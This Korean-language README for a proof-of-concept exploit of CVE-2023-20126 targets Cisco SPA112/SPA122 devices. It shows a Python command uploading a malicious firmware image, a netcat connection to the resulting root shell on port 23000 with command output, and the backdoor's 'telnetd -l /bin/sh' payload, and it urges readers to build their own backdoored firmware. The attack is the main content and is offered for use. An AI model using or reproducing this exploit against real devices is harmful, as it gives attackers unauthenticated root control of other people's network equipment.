
CVE-2023-20126용 PoC
CVE-2023-20126에 대한 최소한의 PoC
이것은 초기 릴리스입니다. 작동하지만 '가장 간단한 경우'의 익스플로잇입니다.
SPA112/SPA122에서 테스트 및 작동 확인 - SPA232D는 다른 펌웨어 이미지가 필요합니다.
23000/tcp 포트에서 루트 셸을 제공합니다.
펌웨어 편집에 사용된 툴체인을 아직 정리해야 하며, 별도의 저장소에 넣을 것입니다. 주로 @BigNerd95의 작업을 기반으로 하지만 SPA112/122 펌웨어 파일에서 작동하도록 약간 수정했습니다.
$ python3 CVE-2023-20126.py http://192.168.0.152 CFW.bin
Base URL: http://192.168.0.152
Firmware File: CFW.bin
Sending firmware update...
Firmware upgrade successful. Device will reboot eventually and be running the new FW.
< wait a few mins, nervously >
$ nc -v 192.168.0.152 23000
Connection to 192.168.0.152 port 23000 [tcp/inovaport1] succeeded!
????????
BusyBox v1.10.2 (2019-10-14 12:41:41 CST) built-in shell (ash)
Enter 'help' for a list of built-in commands.
# id;uname -a;pwd
id;uname -a;pwd
uid=0(admin) gid=0(admin)
Linux SPA112 2.6.26.5 #1 PREEMPT Sun Sep 6 10:54:57 CST 2015 armv5tejl unknown
/
# cat /etc/version
cat /etc/version
router_major_version:1.4.1
router_minor_version:SR5
build_date:Mon Oct 14 12:48:12 CST 2019
build_version:6735
hardware_version:1.1.0
telnetd -l /bin/sh -p 23000을 실행하여 23000/tcp 포트에 루트 셸을 제공하는 PoC 악성 펌웨어 이미지. bignerd95의 작업을 기반으로 함.WTFPL.
git issue를 사용하세요.
이게 당신의 장치를 벽돌로 만들어도 저는 책임을 지지 않습니다.
그건 당신의 문제입니다.
뭐, 저는 그 백도어 펌웨어를 저녁에 대충 만들어 냈습니다.
게다가, 왜 작성 가이드를 따라 자신만의 백도어 펌웨어를 직접 만들지 않습니까?